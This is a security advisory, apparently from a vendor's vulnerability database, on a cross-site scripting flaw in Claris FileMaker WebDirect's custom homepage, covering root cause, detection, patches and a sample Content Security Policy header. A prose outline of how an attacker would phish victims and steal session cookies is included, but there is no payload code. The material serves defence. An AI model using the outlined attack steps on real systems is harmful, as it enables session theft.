CVE-2025-46320 Overview
A cross-site scripting (XSS) vulnerability exists in the FileMaker WebDirect custom homepage feature that could allow attackers to execute arbitrary JavaScript code in the context of authenticated user sessions. This vulnerability could lead to unauthorized access and potentially enable remote code execution on affected systems. The flaw has been fully addressed in FileMaker Server 22.0.4 and FileMaker Server 21.1.7.
Critical Impact
Attackers can inject malicious scripts through the WebDirect custom homepage, potentially stealing session tokens, credentials, or executing actions on behalf of authenticated users.
Affected Products
- Claris FileMaker Server versions prior to 22.0.4
- Claris FileMaker Server versions prior to 21.1.7
- FileMaker WebDirect custom homepage configurations
Discovery Timeline
- 2026-02-24 - CVE-2025-46320 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2025-46320
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The flaw resides in the FileMaker WebDirect custom homepage functionality, where user-supplied input is not properly sanitized before being rendered in the web interface.
The attack requires user interaction, as a victim must navigate to a page containing the malicious payload. When successfully exploited, the attacker's JavaScript code executes within the security context of the victim's browser session, enabling potential session hijacking, credential theft, or further attacks against the FileMaker Server environment.
Root Cause
The vulnerability stems from insufficient input validation and output encoding in the WebDirect custom homepage feature. When administrators configure custom homepage content, the application fails to properly sanitize or encode user-controllable data before reflecting it back to users' browsers. This allows attackers to craft malicious payloads that bypass existing security controls and execute arbitrary client-side code.
Attack Vector
The attack is network-based and requires no authentication from the attacker's perspective. However, it does require user interaction—specifically, a victim must be tricked into visiting a specially crafted URL or interacting with malicious content that triggers the XSS payload. The scope is changed, meaning the vulnerable component (FileMaker WebDirect) impacts resources beyond its security scope, potentially affecting other applications or data accessible from the victim's browser session.
An attacker could exploit this vulnerability by:
- Crafting a malicious URL containing JavaScript payload targeting the custom homepage
- Distributing the malicious link via phishing emails or other social engineering techniques
- Waiting for an authenticated FileMaker user to click the link
- Executing arbitrary JavaScript in the victim's browser to steal session cookies, capture credentials, or perform unauthorized actions
Detection Methods for CVE-2025-46320
Indicators of Compromise
- Unusual JavaScript execution patterns or errors in client browser consoles when accessing FileMaker WebDirect
- Unexpected network requests to external domains originating from the FileMaker WebDirect interface
- Modified or suspicious content appearing in the custom homepage configuration
- User reports of unexpected behavior or redirects when accessing WebDirect
Detection Strategies
- Implement web application firewall (WAF) rules to detect common XSS payloads in requests to FileMaker WebDirect endpoints
- Monitor server logs for requests containing suspicious JavaScript patterns or encoded script tags
- Deploy browser-based XSS detection through Content Security Policy (CSP) violation reporting
- Utilize SentinelOne Singularity Platform to detect anomalous script execution and network behavior on endpoints accessing FileMaker WebDirect
Monitoring Recommendations
- Enable detailed access logging for the FileMaker WebDirect service
- Configure alerts for unusual patterns in HTTP request parameters targeting custom homepage endpoints
- Monitor for CSP violations which may indicate XSS exploitation attempts
- Review FileMaker Server administrative changes to custom homepage configurations
How to Mitigate CVE-2025-46320
Immediate Actions Required
- Upgrade FileMaker Server to version 22.0.4 or 21.1.7 immediately to address this vulnerability
- Review and audit any custom homepage configurations for potentially malicious content
- Implement Content Security Policy (CSP) headers to restrict script execution sources
- Temporarily disable custom homepage functionality if immediate patching is not feasible
Patch Information
Claris has released security updates that fully address this vulnerability. Administrators should upgrade to FileMaker Server 22.0.4 for the 22.x branch or FileMaker Server 21.1.7 for the 21.x branch. For detailed patch information and download links, refer to the Claris Support Article.
Workarounds
- Disable custom homepage functionality in FileMaker WebDirect until patches can be applied
- Implement strict Content Security Policy headers to prevent inline script execution
- Deploy a web application firewall (WAF) with XSS detection rules in front of the FileMaker Server
- Restrict access to FileMaker WebDirect to trusted networks or VPN-connected users only
# Example: Apache configuration to add Content Security Policy header
# Add to your FileMaker Server's web server configuration
<IfModule mod_headers.c>
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';"
</IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
